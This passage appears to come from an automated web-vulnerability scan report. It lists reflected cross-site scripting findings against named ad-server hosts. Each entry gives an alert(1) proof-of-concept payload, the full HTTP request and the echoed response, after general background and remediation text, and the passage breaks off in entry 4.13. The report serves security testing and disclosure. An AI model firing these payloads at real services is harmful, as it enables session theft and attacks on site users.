Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

4.1. http://a.collective-media.net/adj/cm.guardian/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.guardian/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5693a'-alert(1)-'88333851b7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.guardian5693a'-alert(1)-'88333851b7a/;sz=728x90;ord=$random$? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 443
Date: Sun, 02 Oct 2011 23:51:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Tue, 01-Nov-2011 23:51:12 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/cm.guardian5693a'-alert(1)-'88333851b7a/;sz=728x90;net=cm;ord=$random$;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
4.2. http://a.collective-media.net/adj/cm.guardian/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.guardian/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ddccb'-alert(1)-'fb58dd8594f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.guardian/;sz=728x90;ord=$random$?&ddccb'-alert(1)-'fb58dd8594f=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Date: Sun, 02 Oct 2011 23:51:10 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Tue, 01-Nov-2011 23:51:10 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/cm.guardian/;sz=728x90;net=cm;ord=$random$?&ddccb'-alert(1)-'fb58dd8594f=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
4.3. http://a.collective-media.net/adj/cm.guardian/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.guardian/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 660ee'-alert(1)-'ae4a32c4786 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.guardian/;sz=728x90;ord=$random$?660ee'-alert(1)-'ae4a32c4786 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Date: Sun, 02 Oct 2011 23:51:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E3184c20852dc099873bc3845; domain=collective-media.net; path=/; expires=Tue, 01-Nov-2011 23:51:08 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/cm.guardian/;sz=728x90;net=cm;ord=$random$?660ee'-alert(1)-'ae4a32c4786;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
4.4. http://a.collective-media.net/cmadj/cm.guardian/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/cm.guardian/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a54d'-alert(1)-'bfe528f9315 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.guardian4a54d'-alert(1)-'bfe528f9315/;sz=300x250;net=cm;ord=$random$;env=ifr;ord1=63589;cmpgurl=http%253A//www.guardian.co.uk/football/manchester-united? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:51:21 GMT
Content-Length: 8208
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='122eace26f8db51';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-30314387801_1317599481","http://ib.adnxs.com/ptj?member=311&inv_code=cm.guardian4a54d'-alert(1)-'bfe528f9315&size=300x250&imp_id=cm-30314387801_1317599481,122eace26f8db51&referrer=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2Fmanchester-united&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.guardian4a54d%27-
...[SNIP]...
4.5. http://a.collective-media.net/cmadj/cm.guardian/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://a.collective-media.net
Path:   /cmadj/cm.guardian/

Issue detail

The value of the sz request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 264f9(a)bbc3f94df69 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.guardian/;sz=264f9(a)bbc3f94df69 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:51:16 GMT
Content-Length: 8074
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='122eace26f8db51';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
</scr'+'ipt>');var bap_rnd = Math.floor(Math.random()*100000);
var _bao = {
coid:44,
nid:546,
ad_h:,
ad_w:264f9(a)bbc3f94df69,
uqid:bap_rnd,
cps:''
};
document.write('<img style="margin:0;padding:0;" border="0" width="0" height="0" src="http://c.betrad.com/a/4.gif" id="bap-pixel-'+bap_rnd+'"/>
...[SNIP]...
4.6. http://ad.technoratimedia.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.technoratimedia.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c0a1"-alert(1)-"c16fe58ffb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?pfm=1&tlfs=ch&tmen=ch&tphv=ch&rtg=ga&brw=cr3&os=wn7&prm=0&efo=0&atf=1&uatRandNo=65268&ad_type=ad&section=1782250&ad_size=300x250&9c0a1"-alert(1)-"c16fe58ffb9=1 HTTP/1.1
Host: ad.technoratimedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:54:01 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:54:01 GMT
Pragma: no-cache
Content-Length: 4413
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.technoratimedia.com/imp?9c0a1"-alert(1)-"c16fe58ffb9=1&Z=300x250&atf=1&brw=cr3&efo=0&os=wn7&pfm=1&prm=0&rtg=ga&s=1782250&tlfs=ch&tmen=ch&tphv=ch&uatRandNo=65268&_salt=339107265";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';i
...[SNIP]...
4.7. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec07e"><script>alert(1)</script>3f7f80201f0 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=ec07e"><script>alert(1)</script>3f7f80201f0&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26071&s=26072
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C1002%7C4%7C5%7C9%7C6%7C3; rds=15231%7C15228%7C15249%7C15235%7C15250%7C15228%7C15231%7C15248; rv=1; uid=2944787775510337379

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:12:52 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2944787775510337379&rnd=3497789830921369198&fpid=ec07e"><script>alert(1)</script>3f7f80201f0&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...
4.8. http://ad.turn.com/server/pixel.htm [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99f88"><script>alert(1)</script>8138f9b958e was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=1&sp=99f88"><script>alert(1)</script>8138f9b958e HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26071&s=26072
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C1002%7C4%7C5%7C9%7C6%7C3; rds=15231%7C15228%7C15249%7C15235%7C15250%7C15228%7C15231%7C15248; rv=1; uid=2944787775510337379

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:12:52 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2944787775510337379&rnd=9036514181597041788&fpid=1&nu=n&t=&sp=99f88"><script>alert(1)</script>8138f9b958e&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...
4.9. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e961"-alert(1)-"cb5fec4d025 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=468x60&section=2398370&8e961"-alert(1)-"cb5fec4d025=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:49:07 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:49:07 GMT
Pragma: no-cache
Content-Length: 4324
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?8e961"-alert(1)-"cb5fec4d025=1&Z=468x60&s=2398370&_salt=2593956440";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar
...[SNIP]...
4.10. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd43b"><script>alert(1)</script>36334559423 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=728x90&section=2126909&dd43b"><script>alert(1)</script>36334559423=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:54:42 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:54:42 GMT
Pragma: no-cache
Content-Length: 4721
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=728x90&dd43b"><script>alert(1)</script>36334559423=1&s=2126909&_salt=328484640&t=2" target="_parent">
...[SNIP]...
4.11. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bd3c"-alert(1)-"451a8231aa5 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=3bd3c"-alert(1)-"451a8231aa5 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19701

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599365384;key=key1+key2+key3+key4;nodecode=yes;link=3bd3c"-alert(1)-"451a8231aa5") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|9
...[SNIP]...
4.12. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 116c3'-alert(1)-'ce519b8c547 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=116c3'-alert(1)-'ce519b8c547 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19701

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
!="")
{    AT_COUNT=''
if ('2046906'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599367009;key=key1+key2+key3+key4;nodecode=yes;link=116c3'-alert(1)-'ce519b8c547')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE2046906+"'))";
AT_TARGET2046906="_self";
}
window.AT_ClickFn2046906= function (click)
{    click=(isN
...[SNIP]...
4.13. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH

Issue detail

